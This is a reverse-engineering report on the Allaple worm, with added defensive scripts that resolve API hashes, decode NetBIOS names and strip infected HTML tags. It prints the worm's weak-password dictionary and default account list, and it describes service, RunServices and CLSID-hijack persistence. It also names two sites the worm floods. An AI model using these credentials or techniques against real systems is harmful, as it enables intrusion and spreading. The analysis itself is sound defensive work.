MALWARE ANALYSIS NOTES – W32/Allaple

Allaple Worm

A. General function and functionality of the malware

The malware allocates memory, decrypts itself into it, and then passes control to the decrypted code in memory. After decryption it imports system functions through an obfuscated interface. This code then installs itself as a service and searches for .htm/.html files on the logical drives assigned on the system, installing a randomly named (9 character) copy of itself in the \system32\ directory during each search. It prepends to the beginning of each html file it finds an object tag carrying a CLSID value which references the malware executable path in the registry. This effectively turns the html files into launchers for the malware executable. Thus repeated copying, and registry allocation for each of those copies, continues unabated for every html file found.

The next phase involves logging in to common remote accounts using commonly used weak passwords as a spreading mechanism. This covers LAN and SMB (Server Message Block) shares, and there are potential DDoS attacks on two particular websites.

Another payload involves the use of buffer overflow vulnerabilities, which can be assumed given the presence of large repetitive strings, typical of such attacks.

After investigation there does not seem to be any destructive payload. This polymorphic worm/virus (it infects html files) seems to have the sole goal of spreading as much as possible.

B. Behavioral patterns of the malware

Decryption begins at 401792 (OEP). After a quite long sequence, control is passed with a jmp instruction to the decrypted section at 4017DE. This decrypted section goes through another 2 rounds of decryption, which acts as a fail-safe mechanism to thwart basic analysis/disassembly.

I encounter a typical, although basic, viral assembler trick to obfuscate manual reversing, as in:

[screenshot omitted]

A thing needs to be said about the .rdata section, which has no file offset and size values in the section header. So I surmise, according to the decryption addresses, that the virtual allocation is done at runtime, wherein the empty section addresses are filled with decrypted code. Thus, the .rdata section is used as a container for runtime decryption. The rest of the payloads are deployed from this in-memory code for the most part.

C. Local system interaction

[screenshot omitted]

The malware uses the fs register to reach TIB offset 30, i.e. the Process Environment Block (PEB). Further, offset C is accessed in the PEB, which is the PEB_LDR_DATA structure. Again, offset 1C is accessed in this structure, which is the InInitializationOrderModuleList. This data structure is used to locate the image base of kernel32.dll.

[screenshot omitted]

LoadLibraryExA and GetProcAddress are invoked through global constants which serve as function identifiers when calling the APIs.

E.g. 00405034 68 8E4E0EEC PUSH EC0E4E8E ; this value identifies LoadLibraryExA.

The call at 405290 resolves and invokes the required API functions.
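The hashed-identifier scheme above can be checked offline: a resolver hashes every export name of the DLLs the sample loads and looks up the constants found in the binary. The script below is an added example, not code from the original notes. It assumes the classic 32-bit ROR-13 export-name hash used by much Win32 shellcode, an assumption supported by the page's own constant, since ROR-13 of the string "LoadLibraryA" is exactly EC0E4E8E (the notes attribute this value to LoadLibraryExA; both names are in the candidate list, so the reader can see which one the constant actually selects). The candidate export list is constructed for the example.

```python
"""Resolve hashed API identifiers of the kind pushed before the call at 405290.

Added example, not code from the original notes. Assumption: the sample uses the
classic 32-bit ROR-13 hash over the export name; the page's own constant
EC0E4E8E is consistent with that, since ROR-13("LoadLibraryA") == 0xEC0E4E8E.
"""

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def ror13_hash(name: str) -> int:
    """Classic shellcode export-name hash: h = ror13(h) + byte, for each byte of the name."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & MASK32
    return h


# Candidate export names to test against. Constructed list for the example; a real
# triage run would feed it the export tables of kernel32/advapi32/ws2_32 etc.
CANDIDATE_EXPORTS = [
    "LoadLibraryA", "LoadLibraryExA", "GetProcAddress", "VirtualAlloc",
    "VirtualFree", "VirtualFreeEx", "CreateMutexA", "ExitProcess",
]


def build_hash_table(names):
    """Map hash -> export name; a collision would make resolution ambiguous, so report it."""
    table = {}
    for n in names:
        h = ror13_hash(n)
        if h in table and table[h] != n:
            raise ValueError(f"hash collision: {table[h]} / {n}")
        table[h] = n
    return table


def resolve_hashes(constants, names=CANDIDATE_EXPORTS):
    """Return {constant: export name or None} for constants harvested from the binary."""
    table = build_hash_table(names)
    return {c: table.get(c & MASK32) for c in constants}


if __name__ == "__main__":
    # EC0E4E8E is the constant from the PUSH at 00405034 quoted in the notes;
    # 12345678 is a made-up value to show the "unknown" path.
    for const, api in resolve_hashes([0xEC0E4E8E, 0x12345678]).items():
        print(f"{const:08X} -> {api}")
```

In practice the candidate list would be the full export tables of kernel32.dll, advapi32.dll, ws2_32.dll and the other DLLs named in the import table in the appendix; the collision check matters because a resolver that only compares hashes cannot tell two colliding exports apart.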

VirtualAlloc and VirtualFreeEx are set up by preparing the stack frame for invocation. 2000h (131072 bytes) are allocated in memory for the viral code.

[screenshot omitted]

More required DLLs are linked this way.

The jump thunk table is visible in the decrypted code, from 348112 to 348370.

[all tables given in appendix]

A mutex is created with a seemingly long hardcoded name.

[screenshot omitted]

The .mem file from OllyDbg is further analyzed and found to be a PE file with its section headers renewed, i.e. the .rdata section now has a raw offset/size and is valid. All other sections have new attributes. It is essentially a new file now in memory: the unobfuscated and decrypted malware, ready for payloads.

Further, a list of new strings is recovered from the hex dump and analyzed. They give very direct references to certain exploit/backdoor potentials. A list of potential (to-be) dropped executables, potentially malicious registry changes, a string of password keywords etc. all indicate a totally different executable as a payload. I also conclude that the original string dump from the encrypted malware is either a complementing component or a complete decoy system to fool reversers into thinking it is a downloader/dialer, a far less malicious file than it really is.

[screenshot omitted]

A new set of cryptographic algorithms is found in the executable dump. Originally no crypto signatures were detected.

[screenshot omitted]

It concatenates the filename string "irdvxc.exe" to the system directory ~\system32\, which indicates the file path to be dropped.

[screenshots omitted]

It then copies the parent file to the system32 directory and renames it "irdvxc.exe". This is the first malicious file dropped in the filesystem.

[screenshots omitted]

It then proceeds to install "irdvxc.exe" in the system folder as a service, using a "/installservice" switch/parameter, by first concatenating this string as below:

[screenshot omitted]

Register view:

[screenshot omitted]

It then prepares to start it using the "/start" switch, again via string concatenation.

[screenshot omitted]

The worm takes a brief sleep of 2000 ms or 2 seconds.

The control then flows to an internal subroutine at 347FF0, where a stack frame is prepared and the next sequence of payload installation continues.

[screenshot omitted]

Here, a new process is initiated using the CreateProcessA API, as follows:

[screenshot omitted]

The new process is running, as can be verified in Task Manager.

[screenshot omitted]

As expected this is a complete copy of the parent file, encrypted/obfuscated with the .rdata section having no raw offset/size (the hashes are identical).

Thus the initial payload involves installing itself as a running process, with preparations to install itself as a service as well.

It accessed these keys before exiting. The "irdvxc.exe" process was still running.

[screenshot omitted]

A few patches are made to the virtualization detection routines so that the other payloads get activated. Thereafter, we get function calls at 34900A (some file path manipulation routine), 34911B, 3491A3 and 347D14.

These strings come up:

{3ED2D4F1-8C31-030B-F817-29B6C522E670} // a GUID

"{%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" // the format string

These are pushed and a call is made at 3424E0, followed by a call to wsprintfA at 342523, as shown below.

[screenshot omitted]

At the call at 342473 a CLSID is created and formatted according to the value given below:

[screenshots omitted]

A registry key is created which saves the CLSID value above.

[screenshots omitted]

Thus, an HKCR key is created, with the subkey and corresponding value. This is the third payload. "tslnkxrcbnzhevrk.exe" is stored in that CLSID subkey, of length 34 as a zero terminated string.

Another key is set:

[screenshot omitted]

HKCR\CLSID\{3ED2D4F1-8C31-030B-F817-29B6C522E670}\LocalServer32 with

"C:\Documents and Settings\norman\Desktop\0afa3b27802d2ab6a751248dbe32cb62.exe" as the value.

Further patching for flow control and fooling the malware is required (it seems to be very benign in VMware). I change the control flow to focus on my next section at 346C40:

The parent file path is prepared with a "/service" switch. OpenSCManagerA is invoked. According to MSDN, this establishes a connection to the service control manager on the specified computer and opens the specified service control manager database.

This is potential malware behavior in this context. The malware is trying to gain access to the SCM database.

[screenshot omitted]

In stack view:

[screenshot omitted]

Advapi32.CreateServiceA is invoked and the parameters passed are shown above.

MSDN: "Creates a service object and adds it to the specified service control manager database."

Thus this payload indicates that the parent malware is being installed as a service with all the required parameters for control and access. The start type parameter indicates that it will run on Windows startup. All errors are ignored, indicating a stealth motive: the user should not be notified of its activities, and the service should run uninterrupted. The access levels are all inclusive, meaning unrestricted access, thus compromising the system.

The "DisplayName" parameter, "Network Helper Service", is chosen to deceive the victim user into taking it for a legitimate service process. The "ServiceType" parameter indicates the following: the service can interact with the desktop, and it runs in its own process. More patching results in access to another subroutine at 341328. This connects the main thread of a service process to the service control manager, which causes the thread to be the service control dispatcher thread for the calling process.

Then we enter another section where the socket API is invoked.

[screenshot omitted]

The parameters indicate that an IPv4 TCP stream socket is being initialized, with the values converted to little-endian format.

[screenshot omitted]

Specific parameters are retrieved and a connection attempt is made.

[screenshot omitted]

At 342750 a separate thread is created and used to pass parameters to ws2_32.dll, to facilitate access to the websites http://www.starman.ee and http://www.if.ee. This again goes into an infinite loop, which denotes a DoS attempt at these IPs. More infected machines would mean a DDoS attack.

A buffer overflow exploit is a strong possibility here given the presence of exploit-like strings such as:

EMEPEDEBEMEIEPFDFECACACACACACAAA

CKFDENECFDEFFCFGEFFCCACACACACAC

111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111xW4

“Colib for lazy guys” // in the icmp code section.

The NETBIOS C$ share is being targeted, as is \\*SMBSERVER\IPC$.

Windows 2000 2195, Windows 2000 5.0, PC NETWORK PROGRAM 1.0, MICROSOFT NETWORKS 1.03, MICROSOFT NETWORKS 3.0, LANMAN1.0, LM1.2X002, LANMAN2.1, NT LANMAN 1.0, NT LM 0.12. These indicate the platform (build, revision), protocol, network type and version.
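Before treating the two letter-only strings above as overflow padding, it is worth checking whether they are NetBIOS first-level encoded names (RFC 1001, section 14.1), since the code nearby targets \\*SMBSERVER\IPC$ and such names are what a NetBIOS session request carries. The decoder below is an added example and not part of the original notes; it takes the two strings exactly as transcribed above. The first decodes to the name LOCALHOST with suffix byte 00; the second, which is transcribed with 31 characters and so lacks its final suffix character, decodes to *SMBSERVER with the suffix missing, which the function reports rather than guesses.

```python
"""Decode NetBIOS "first-level encoded" names (RFC 1001 section 14.1).

Added example, not code from the original notes. Each byte of the 16-byte
NetBIOS name (15 name characters + 1 suffix/service byte) is split into two
nibbles and each nibble is written as 'A' + nibble, giving 32 letters in A..P.
"""


def decode_netbios_name(encoded: str):
    """Return (name, suffix, leftover).

    name     the 15-character name with trailing space padding removed
    suffix   the 16th byte (service type), or None if it is not present
    leftover trailing characters that did not form a complete pair (the
             second string in the notes is transcribed with 31 characters)
    """
    if any(c not in "ABCDEFGHIJKLMNOP" for c in encoded):
        raise ValueError("not a first-level encoded NetBIOS name")
    pair_count = len(encoded) // 2
    raw = bytes(
        ((ord(encoded[2 * i]) - ord("A")) << 4) | (ord(encoded[2 * i + 1]) - ord("A"))
        for i in range(pair_count)
    )
    name = raw[:15].decode("ascii", errors="replace").rstrip(" ")
    suffix = raw[15] if len(raw) > 15 else None
    leftover = encoded[2 * pair_count:]
    return name, suffix, leftover


def encode_netbios_name(name: str, suffix: int) -> str:
    """Inverse operation, used to confirm the decoder round-trips."""
    raw = name.encode("ascii").ljust(15, b" ")[:15] + bytes([suffix])
    return "".join(chr(ord("A") + (b >> 4)) + chr(ord("A") + (b & 0xF)) for b in raw)


# The two letter-only strings exactly as transcribed in the notes (the second is
# 31 characters long on the page, one short of a complete encoded name).
STRINGS_FROM_NOTES = [
    "EMEPEDEBEMEIEPFDFECACACACACACAAA",
    "CKFDENECFDEFFCFGEFFCCACACACACAC",
]

if __name__ == "__main__":
    for s in STRINGS_FROM_NOTES:
        name, suffix, leftover = decode_netbios_name(s)
        shown = f"<{suffix:02X}>" if suffix is not None else "<missing>"
        print(f"{s} -> {name!r} suffix {shown} leftover {leftover!r}")
```

The all-'1' string with the "xW4" tail above is of a different shape and is not affected by this check; the decoder only says something about strings that consist solely of the letters A to P.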

Several ports were seen accessed on UDP (NETBIOS) and TCP (LAN). These ports were not recorded in this session, but the 60s range showed quite a lot of activity. More analysis could be done on recording the individual ports, but since they vary from session to session, I chose to stick with the range option.

At 342680:

[screenshot omitted]

This object code is written to the beginning of html files, starting from Local Settings\Temporary Internet Files\Content.IE5\<random folder name>\<any file [1].htm>, from where the infection spreads to all logical drives assigned in the system.
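As an added example (not code from the original notes), a scanner/cleaner for the infected html files described above. It assumes the prepended "object code" is an HTML <object> element whose classid attribute references the CLSID the worm registered under HKCR\CLSID\{...}\LocalServer32; the exact markup is in the screenshot and is not reproduced here, so the sample pages are constructed. Only tags referencing a known-bad CLSID are removed, so a legitimately embedded control elsewhere in a page is left alone.

```python
"""Find and strip <object classid="clsid:{...}"> tags prepended to .htm/.html files.

Added example, not code from the original notes. Assumption: the "object code"
the notes describe is an HTML <object> element whose classid attribute carries
the CLSID registered under HKCR\CLSID\{...}\LocalServer32. The sample pages
below are constructed for the example.
"""
import re

# Case-insensitive match for an <object ...> element carrying a clsid: reference,
# together with its closing tag when one follows.
OBJECT_RE = re.compile(
    r"<object\b[^>]*\bclassid\s*=\s*['\"]?clsid:\{?([0-9a-f\-]{36})\}?['\"]?[^>]*>"
    r"(?:.*?</object\s*>)?",
    re.IGNORECASE | re.DOTALL,
)

# CLSIDs the notes record the worm writing to the registry.
KNOWN_BAD_CLSIDS = {
    "3ED2D4F1-8C31-030B-F817-29B6C522E670",
}


def find_object_clsids(html: str, head_bytes: int = 4096):
    """Return the CLSIDs referenced by <object> tags within the first head_bytes."""
    return [m.group(1).upper() for m in OBJECT_RE.finditer(html[:head_bytes])]


def clean_html(html: str, bad_clsids=KNOWN_BAD_CLSIDS):
    """Remove <object> tags that reference a known-bad CLSID.

    Returns (cleaned_html, removed_clsids). Tags referencing other CLSIDs are kept.
    """
    removed = []

    def _strip(m):
        clsid = m.group(1).upper()
        if clsid in bad_clsids:
            removed.append(clsid)
            return ""
        return m.group(0)

    return OBJECT_RE.sub(_strip, html), removed


# Constructed samples: an infected page with the tag prepended, and a benign page
# embedding a control with a made-up CLSID that must survive cleaning.
INFECTED = ('<OBJECT classid="clsid:{3ED2D4F1-8C31-030B-F817-29B6C522E670}"></OBJECT>'
            "<html><body>hello</body></html>")
BENIGN = ('<object classid="clsid:{00000000-1111-2222-3333-444444444444}"></object>'
          "<html><body>hi</body></html>")

if __name__ == "__main__":
    for page in (INFECTED, BENIGN):
        cleaned, removed = clean_html(page)
        print(removed, cleaned)
```

Run over a directory, the scanner step (find_object_clsids on the head of each file) is cheap and gives the list of CLSIDs actually planted, which can then be cross-checked against the HKCR\CLSID keys before anything is rewritten.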

Following this, at 341FF1 we find another access preparation for the path "C:\WINDOWS\system32\kvjwbcen7.dll".

This is another dropped file, an exact replica of the parent file.

[screenshot omitted]

And a value is set:

HKCR\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32\(Default)

= C:\WINDOWS\system32\kvjwbcen7.dll

This effectively registers a 32-bit in-process server and specifies the threading model of the apartment the server can run in.

Thus the replication procedure continues using 9 char random names:

(“C:\WINDOWS\system32\hskxknle7.dll”)

(“C:\WINDOWS\system32\ececeeww7.dll”)

(“C:\WINDOWS\system32\eqtejetr7.dll”)

(“C:\WINDOWS\system32\tbbeqsjk7.dll”)

(“C:\WINDOWS\system32\heeshken7.dll”)

(“C:\WINDOWS\system32\zbvhjkxk7.dll”)

(“C:\WINDOWS\system32\cczthbje7.dll”)

and the like.

And corresponding registry values are set, incrementing on each dropped file to keep the values unique:

"0.0017022","3","0","0","2","1","0","HKCR\CLSID\{00000304-0000-0000-C000-000000000046}\InprocServer32\(Default)"

"0.0016413","3","0","0","2","1","0","HKCR\CLSID\{00000305-0000-0000-C000-000000000046}\InprocServer32\(Default)"

"0.0016740","3","0","0","2","1","0","HKCR\CLSID\{00000306-0000-0000-C000-000000000046}\InprocServer32\(Default)"

"0.0016506","3","0","0","2","1","0","HKCR\CLSID\{00000308-0000-0000-C000-000000000046}\InprocServer32\(Default)"

"0.0019505","3","0","0","2","1","0","HKCR\CLSID\{00000309-0000-0000-C000-000000000046}\InprocServer32\(Default)"

"0.0017583","3","0","0","2","1","0","HKCR\CLSID\{0000030B-0000-0000-C000-000000000046}\InprocServer32\(Default)"

"0.0017439","3","0","0","2","1","0","HKCR\CLSID\{00000315-0000-0000-C000-000000000046}\InprocServer32\(Default)"

"0.0016809","3","0","0","2","1","0","HKCR\CLSID\{00000316-0000-0000-C000-000000000046}\InprocServer32\(Default)"

This goes into a never ending loop in the main thread. No additional threads are created at this stage.

At 341632, HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\MSDisk is set with the value

"C:\Documents and Settings\norman\Desktop\0afa3b27802d2ab6a751248dbe32cb62.exe /service"

List of Passwords extracted from the decrypted malware:

test2 password test1 telnet ruler remote random qwerty public private poiuytre passwd oracle nopass nobody newpass network monitor money manager login internet install hello guest default debug database computer coffee backup backdoor anonymous alpha access abc123 system super shadow setup security secure secret 123456789 12345678 1234567 123456 12345 00000000 0000000 000000 00000 server asdfgh

List of default accounts for radmin login:

SUPPORT_388945a0, TelnetClients, HelpAssistant, HelpServicesGroup, TsInternetUser, SQLDebugger, SQLServer, SQLAgentCmdExec, NetShowServices, ASPNET, IUSR_, IWAM_, ASPNET, WINS, POP3, vmware, –group, –user, Authors, Admins, Browsers, Guests, Users, Developers, Administrators.

D. Original infection vector and propagation methodology

USB drives, SMB file shares, LAN, radmin logins. Once locally executed it does not need user interaction to spread.

E. Any information concerning development of malware (compiler type, country of origin, author names/handles, etc.)

By parsing the strings in both the dumped file and the parent file, I surmise that the origins could be in the EU, particularly Germany, Sweden and Finland.

The indications include .NLS file references, which are National Language Settings files, along with system path names in German.

F. Mitigation:

I. The analyst recommends killing any process whose name is a random sequence of 9 characters.

II. All HKCR\CLSID keys following an incrementing sequence must be deleted.

III. The services must be uninstalled by simply deleting the relevant keys.

IV. Passwords on all default accounts must be reviewed and changed following a strong password policy: alphanumeric sequences with special characters, minimum 10 characters, no dictionary words, and none from the found password list.

V. All .htm/.html files in 'Local Settings\Tempor~\Content.IE5\<all folders>' must be cleaned.

VI. The \system32\ folder contains most of the dropped executables in DLL format. Since the naming scheme and hash are known, they must all simply be deleted.

VII. SMB, LANMAN and NETBIOS shares must be audited to detect activity trying to communicate with the discovered websites, which are supposedly targeted for a DDoS attack.

VIII. A registry cleaner and defragmenter utility is recommended after cleaning, and a rescan of the system for any malware is mandatory, even after cleaning.

Appendix:

I] Identification:

_____________________________________________________________

Name: 0AFA3B27802D2AB6A751248DBE32CB62.bin

Size: 1015808

CRC-32: 332C82E1

MD5: 0AFA3B27802D2AB6A751248DBE32CB62

SHA1: FC2FED6EFBED67FC6C5F481573A6129F18D45D72

Read only: No

Hidden: No

System file: No

Directory: No

Archive: Yes

Symbolic link: No

______________________________________________________________

PE structure information [base data]:

____________________________

Machine: 014C – Intel 386

Number of sections: 0003

Time/Date stamp: 22923B70 (5/18/1988 6:33:36 PM)

Address of entry point: 00001792

Base of code: 00001000

Base of data: 00005000

Image base: 00400000

Section alignment: 00001000

File alignment: 00000200

Sub system: 0002 – Windows graphical user interface (GUI) subsystem

_____PE Sections _____________________________________________

Section   VirtSize  VirtAddr  PhysSize  PhysAddr  Flags     CRC32     MD5
.text     00003428  00001000  00003600  00000400  60000020  805D7C21  CCFC80BA411E1E02C54C415D292708ED
.rdata    00010000  00005000  00000000  00000000  C0000080  -         -
.data     0000A489  00015000  0000A600  00003A00  C0000040  1EC02E9E  B4DC9B51C4845D74DF3B69497F9CD03A

_____________________________________________________________

II] The complete import table:

00348112 -FF25 90313500 JMP DWORD PTR DS:[353190] ; user32.wsprintfA

00348118 -FF25 8C313500 JMP DWORD PTR DS:[35318C] ; user32.CharLowerA

0034811E -FF25 0C313500 JMP DWORD PTR DS:[35310C] ; kernel32.CloseHandle

00348124 -FF25 08313500 JMP DWORD PTR DS:[353108] ; kernel32.CopyFileA

0034812A -FF25 04313500 JMP DWORD PTR DS:[353104] ; kernel32.CreateEventA

00348130 -FF25 38313500 JMP DWORD PTR DS:[353138] ; kernel32.CreateFileA

00348136 -FF25 34313500 JMP DWORD PTR DS:[353134] ; kernel32.CreateFileMappingA

0034813C -FF25 30313500 JMP DWORD PTR DS:[353130] ; kernel32.CreateMutexA

00348142 -FF25 2C313500 JMP DWORD PTR DS:[35312C] ; kernel32.CreateProcessA

00348148 -FF25 28313500 JMP DWORD PTR DS:[353128] ; kernel32.CreateThread

0034814E -FF25 24313500 JMP DWORD PTR DS:[353124] ; kernel32.DeleteFileA

00348154 -FF25 20313500 JMP DWORD PTR DS:[353120] ; ntdll.RtlEnterCriticalSection

0034815A -FF25 1C313500 JMP DWORD PTR DS:[35311C] ; kernel32.ExitProcess

00348160 -FF25 18313500 JMP DWORD PTR DS:[353118] ; kernel32.ExitThread

00348166 -FF25 14313500 JMP DWORD PTR DS:[353114] ; kernel32.FindClose

0034816C -FF25 B0303500 JMP DWORD PTR DS:[3530B0] ; kernel32.FindFirstFileA

00348172 -FF25 AC303500 JMP DWORD PTR DS:[3530AC] ; kernel32.FindNextFileA

00348178 -FF25 EC303500 JMP DWORD PTR DS:[3530EC] ; kernel32.FlushViewOfFile

0034817E -FF25 A4303500 JMP DWORD PTR DS:[3530A4] ; kernel32.GetCommandLineW

00348184 -FF25 B4303500 JMP DWORD PTR DS:[3530B4] ; kernel32.GetCurrentProcess

0034818A -FF25 64303500 JMP DWORD PTR DS:[353064] ; kernel32.GetCurrentProcessId

00348190 -FF25 54303500 JMP DWORD PTR DS:[353054] ; kernel32.GetDriveTypeA

00348196 -FF25 58303500 JMP DWORD PTR DS:[353058] ; kernel32.GetFileSize

0034819C -FF25 5C303500 JMP DWORD PTR DS:[35305C] ; ntdll.RtlGetLastWin32Error

003481A2 -FF25 60303500 JMP DWORD PTR DS:[353060] ; kernel32.GetLogicalDriveStringsA

003481A8 -FF25 68303500 JMP DWORD PTR DS:[353068] ; kernel32.GetModuleFileNameA

003481AE -FF25 6C303500 JMP DWORD PTR DS:[35306C] ; kernel32.GetModuleHandleA

003481B4 -FF25 70303500 JMP DWORD PTR DS:[353070] ; kernel32.GetProcAddress

003481BA -FF25 74303500 JMP DWORD PTR DS:[353074] ; kernel32.GetSystemDirectoryA

003481C0 -FF25 78303500 JMP DWORD PTR DS:[353078] ; kernel32.GetTickCount

003481C6 -FF25 7C303500 JMP DWORD PTR DS:[35307C] ; kernel32.GetVersionExA

003481CC -FF25 80303500 JMP DWORD PTR DS:[353080] ; kernel32.InitializeCriticalSection

003481D2 -FF25 84303500 JMP DWORD PTR DS:[353084] ; kernel32.InterlockedDecrement

003481D8 -FF25 88303500 JMP DWORD PTR DS:[353088] ; kernel32.InterlockedIncrement

003481DE -FF25 8C303500 JMP DWORD PTR DS:[35308C] ; kernel32.IsBadReadPtr

003481E4 -FF25 90303500 JMP DWORD PTR DS:[353090] ; ntdll.RtlLeaveCriticalSection

003481EA -FF25 94303500 JMP DWORD PTR DS:[353094] ; kernel32.LoadLibraryA

003481F0 -FF25 98303500 JMP DWORD PTR DS:[353098] ; kernel32.LocalAlloc

003481F6 -FF25 9C303500 JMP DWORD PTR DS:[35309C] ; kernel32.LocalFree

003481FC -FF25 A0303500 JMP DWORD PTR DS:[3530A0] ; kernel32.MapViewOfFile

00348202 -FF25 44313500 JMP DWORD PTR DS:[353144] ; kernel32.OpenFileMappingA

00348208 -FF25 A8303500 JMP DWORD PTR DS:[3530A8] ; kernel32.ReadFile

0034820E -FF25 3C313500 JMP DWORD PTR DS:[35313C] ; kernel32.ResumeThread

00348214 -FF25 40313500 JMP DWORD PTR DS:[353140] ; kernel32.SetErrorMode

0034821A -FF25 10313500 JMP DWORD PTR DS:[353110] ; kernel32.SetEvent

00348220 -FF25 B8303500 JMP DWORD PTR DS:[3530B8] ; kernel32.SetFileAttributesA

00348226 -FF25 BC303500 JMP DWORD PTR DS:[3530BC] ; kernel32.SetFilePointer

0034822C -FF25 C0303500 JMP DWORD PTR DS:[3530C0] ; kernel32.SetThreadPriority

00348232 -FF25 C4303500 JMP DWORD PTR DS:[3530C4] ; kernel32.Sleep

00348238 -FF25 C8303500 JMP DWORD PTR DS:[3530C8] ; kernel32.SuspendThread

0034823E -FF25 CC303500 JMP DWORD PTR DS:[3530CC] ; kernel32.TerminateProcess

00348244 -FF25 D0303500 JMP DWORD PTR DS:[3530D0] ; kernel32.UnmapViewOfFile

0034824A -FF25 D4303500 JMP DWORD PTR DS:[3530D4] ; kernel32.VirtualAlloc

00348250 -FF25 D8303500 JMP DWORD PTR DS:[3530D8] ; kernel32.VirtualFree

00348256 -FF25 DC303500 JMP DWORD PTR DS:[3530DC] ; kernel32.WaitForSingleObject

0034825C -FF25 E0303500 JMP DWORD PTR DS:[3530E0] ; kernel32.WideCharToMultiByte

00348262 -FF25 E4303500 JMP DWORD PTR DS:[3530E4] ; kernel32.WriteFile

00348268 -FF25 E8303500 JMP DWORD PTR DS:[3530E8] ; kernel32.lstrcatA

0034826E -FF25 48313500 JMP DWORD PTR DS:[353148] ; kernel32.lstrcmpA

00348274 -FF25 F0303500 JMP DWORD PTR DS:[3530F0] ; kernel32.lstrcmpiA

0034827A -FF25 F4303500 JMP DWORD PTR DS:[3530F4] ; kernel32.lstrcpyA

00348280 -FF25 F8303500 JMP DWORD PTR DS:[3530F8] ; kernel32.lstrcpynA

00348286 -FF25 FC303500 JMP DWORD PTR DS:[3530FC] ; kernel32.lstrlenA

0034828C -FF25 00313500 JMP DWORD PTR DS:[353100] ; kernel32.lstrlenW

00348292 -FF25 04303500 JMP DWORD PTR DS:[353004] ; MSVCRT.memset

00348298 -FF25 00303500 JMP DWORD PTR DS:[353000] ; MSVCRT.strstr

0034829E -FF25 4C303500 JMP DWORD PTR DS:[35304C] ; imagehlp.CheckSumMappedFile

003482A4 -FF25 68313500 JMP DWORD PTR DS:[353168] ; ole32.CoCreateGuid

003482AA -FF25 64313500 JMP DWORD PTR DS:[353164] ; ole32.CoInitialize

003482B0 -FF25 70313500 JMP DWORD PTR DS:[353170] ; ole32.CoRegisterClassObject

003482B6 -FF25 60313500 JMP DWORD PTR DS:[353160] ; ole32.CoTaskMemAlloc

003482BC -FF25 5C313500 JMP DWORD PTR DS:[35315C] ; ole32.CoTaskMemFree

003482C2 -FF25 78313500 JMP DWORD PTR DS:[353178] ; shell32.CommandLineToArgvW

003482C8 -FF25 20303500 JMP DWORD PTR DS:[353020] ; ADVAPI32.CryptAcquireContextA

003482CE -FF25 1C303500 JMP DWORD PTR DS:[35301C] ; ADVAPI32.CryptGenRandom

003482D4 -FF25 18303500 JMP DWORD PTR DS:[353018] ; ADVAPI32.CryptReleaseContext

003482DA -FF25 44303500 JMP DWORD PTR DS:[353044] ; ADVAPI32.RegCloseKey

003482E0 -FF25 14303500 JMP DWORD PTR DS:[353014] ; ADVAPI32.RegCreateKeyA

003482E6 -FF25 24303500 JMP DWORD PTR DS:[353024] ; ADVAPI32.RegDeleteValueA

003482EC -FF25 28303500 JMP DWORD PTR DS:[353028] ; ADVAPI32.RegEnumKeyExA

003482F2 -FF25 2C303500 JMP DWORD PTR DS:[35302C] ; ADVAPI32.RegOpenKeyA

003482F8 -FF25 30303500 JMP DWORD PTR DS:[353030] ; ADVAPI32.RegOpenKeyExA

003482FE -FF25 34303500 JMP DWORD PTR DS:[353034] ; ADVAPI32.RegQueryValueA

00348304 -FF25 38303500 JMP DWORD PTR DS:[353038] ; ADVAPI32.RegSetValueA

0034830A -FF25 3C303500 JMP DWORD PTR DS:[35303C] ; ADVAPI32.RegSetValueExA

00348310 -FF25 40303500 JMP DWORD PTR DS:[353040] ; ADVAPI32.SetServiceStatus

00348316 -FF25 C8313500 JMP DWORD PTR DS:[3531C8] ; ws2_32.WSAGetLastError

0034831C -FF25 C4313500 JMP DWORD PTR DS:[3531C4] ; ws2_32.WSAStartup

00348322 -FF25 C0313500 JMP DWORD PTR DS:[3531C0] ; ws2_32.closesocket

00348328 -FF25 BC313500 JMP DWORD PTR DS:[3531BC] ; ws2_32.connect

0034832E -FF25 B8313500 JMP DWORD PTR DS:[3531B8] ; ws2_32.gethostbyname

00348334 -FF25 B4313500 JMP DWORD PTR DS:[3531B4] ; ws2_32.ntohl

0034833A -FF25 AC313500 JMP DWORD PTR DS:[3531AC] ; ws2_32.ntohs

00348340 -FF25 A4313500 JMP DWORD PTR DS:[3531A4] ; ws2_32.inet_addr

00348346 -FF25 D4313500 JMP DWORD PTR DS:[3531D4] ; ws2_32.inet_ntoa

0034834C -FF25 A0313500 JMP DWORD PTR DS:[3531A0] ; ws2_32.ioctlsocket

00348352 -FF25 98313500 JMP DWORD PTR DS:[353198] ; ws2_32.recv

00348358 -FF25 9C313500 JMP DWORD PTR DS:[35319C] ; ws2_32.select

0034835E -FF25 A8313500 JMP DWORD PTR DS:[3531A8] ; ws2_32.send

00348364 -FF25 CC313500 JMP DWORD PTR DS:[3531CC] ; ws2_32.setsockopt

0034836A -FF25 D0313500 JMP DWORD PTR DS:[3531D0] ; ws2_32.shutdown

00348370 -FF25 B0313500 JMP DWORD PTR DS:[3531B0] ; ws2_32.socket

III] VirusTotal Scan Results:

AhnLab-V3 2010.09.21.01 2010.09.21 Win-Trojan/Starman.Gen

AntiVir 8.2.4.60 2010.09.21 TR/Dropper.Gen

Antiy-AVL 2.0.3.7 2010.09.22 Worm/Win32.Allaple.gen

Authentium 5.2.0.5 2010.09.22 W32/EmailWorm.AMV

Avast 4.8.1351.0 2010.09.21 Win32:Allaple

Avast5 5.0.594.0 2010.09.21 Win32:Allaple

AVG 9.0.0.851 2010.09.22 Worm/Allaple.D

BitDefender 7.2 2010.09.22 Win32.Worm.Allaple.Gen

CAT-QuickHeal 11.00 2010.09.21 I-Worm.Allaple.gen

ClamAV 0.96.2.0-git 2010.09.21 Worm.Allaple-306

Comodo 6158 2010.09.22 NetWorm.Win32.Allaple.GEN

DrWeb 5.0.2.03300 2010.09.22 Trojan.Starman

Emsisoft 5.0.0.37 2010.09.22 Net-Worm.Win32.Allaple.b!IK

eSafe 7.0.17.0 2010.09.21 –

eTrust-Vet 36.1.7869 2010.09.21 Win32/Mallar

